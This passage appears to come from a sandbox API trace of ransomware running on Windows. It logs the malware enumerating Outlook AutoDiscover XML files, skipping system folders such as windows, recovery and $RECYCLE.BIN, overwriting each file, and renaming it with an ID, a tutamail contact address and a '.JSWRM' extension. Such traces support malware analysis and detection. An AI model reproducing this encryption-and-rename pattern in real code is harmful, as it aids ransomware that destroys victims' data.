Office\\root\\Office16\\OutlookAutoDiscover\\NVBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nvbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\NVBELL.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\nvbell.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.850] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PACBELL.NET.XML", cAlternateFileName="PACBEL~1.XML")) returned 1 [0137.850] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2=".") returned 1 [0137.850] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="..") returned 1 [0137.850] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="...") returned 1 [0137.850] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="windows") returned -1 [0137.850] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="recovery") returned -1 [0137.851] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="perflogs") returned -1 [0137.851] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="documents and settings") returned 1 [0137.851] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.851] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="system volume information") returned -1 [0137.851] lstrcmpiW (lpString1="PACBELL.NET.XML", lpString2="msocache") returned 1 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PACBELL.NET.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PACBELL.NET.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PACBELL.NET.XML", lpUsedDefaultChar=0x0) returned 15 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PACBELL.NET.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PACBELL.NET.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PACBELL.NET.XML", lpUsedDefaultChar=0x0) returned 15 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PACBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\pacbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.852] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.852] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.852] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.853] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.853] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.853] CloseHandle (hObject=0x238) returned 1 [0137.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PACBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\pacbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PACBELL.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\pacbell.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.854] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PRODIGY.NET.XML", cAlternateFileName="PRODIG~1.XML")) returned 1 [0137.854] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2=".") returned 1 [0137.854] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="..") returned 1 [0137.854] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="...") returned 1 [0137.854] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="windows") returned -1 [0137.854] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="recovery") returned -1 [0137.855] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="perflogs") returned 1 [0137.855] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="documents and settings") returned 1 [0137.855] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.855] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="system volume information") returned -1 [0137.855] lstrcmpiW (lpString1="PRODIGY.NET.XML", lpString2="msocache") returned 1 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRODIGY.NET.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRODIGY.NET.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRODIGY.NET.XML", lpUsedDefaultChar=0x0) returned 15 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRODIGY.NET.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRODIGY.NET.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRODIGY.NET.XML", lpUsedDefaultChar=0x0) returned 15 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PRODIGY.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\prodigy.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.856] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.856] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.856] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.857] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.857] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.857] CloseHandle (hObject=0x238) returned 1 [0137.857] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PRODIGY.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\prodigy.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\PRODIGY.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\prodigy.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.858] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ROGERS.COM.XML", cAlternateFileName="ROGERS~1.XML")) returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2=".") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="..") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="...") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="windows") returned -1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="recovery") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="perflogs") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="documents and settings") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="system volume information") returned -1 [0137.859] lstrcmpiW (lpString1="ROGERS.COM.XML", lpString2="msocache") returned 1 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROGERS.COM.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROGERS.COM.XML", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROGERS.COM.XML", lpUsedDefaultChar=0x0) returned 14 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROGERS.COM.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ROGERS.COM.XML", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROGERS.COM.XML", lpUsedDefaultChar=0x0) returned 14 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\rogers.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.860] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=818) returned 1 [0137.860] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.860] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0137.862] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.862] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0137.862] CloseHandle (hObject=0x238) returned 1 [0137.862] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\rogers.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\ROGERS.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\rogers.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.866] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SBCGLOBAL.NET.XML", cAlternateFileName="SBCGLO~1.XML")) returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2=".") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="..") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="...") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="windows") returned -1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="recovery") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="perflogs") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="documents and settings") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="system volume information") returned -1 [0137.866] lstrcmpiW (lpString1="SBCGLOBAL.NET.XML", lpString2="msocache") returned 1 [0137.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SBCGLOBAL.NET.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SBCGLOBAL.NET.XML", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SBCGLOBAL.NET.XML", lpUsedDefaultChar=0x0) returned 17 [0137.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SBCGLOBAL.NET.XML", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SBCGLOBAL.NET.XML", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SBCGLOBAL.NET.XML", lpUsedDefaultChar=0x0) returned 17 [0137.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\sbcglobal.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.867] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=816) returned 1 [0137.867] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.867] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0137.869] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.869] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0137.869] CloseHandle (hObject=0x238) returned 1 [0137.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\sbcglobal.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SBCGLOBAL.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\sbcglobal.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.870] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SNET.NET.XML", cAlternateFileName="SNETNE~1.XML")) returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2=".") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="..") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="...") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="windows") returned -1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="recovery") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="perflogs") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="documents and settings") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="system volume information") returned -1 [0137.870] lstrcmpiW (lpString1="SNET.NET.XML", lpString2="msocache") returned 1 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNET.NET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNET.NET.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNET.NET.XML", lpUsedDefaultChar=0x0) returned 12 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNET.NET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SNET.NET.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SNET.NET.XML", lpUsedDefaultChar=0x0) returned 12 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\snet.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.871] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0137.871] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.871] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.884] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.884] CloseHandle (hObject=0x238) returned 1 [0137.885] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\snet.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SNET.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\snet.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.886] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SWBELL.NET.XML", cAlternateFileName="SWBELL~1.XML")) returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2=".") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="..") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="...") returned 1 [0137.886] lstrcmpiW 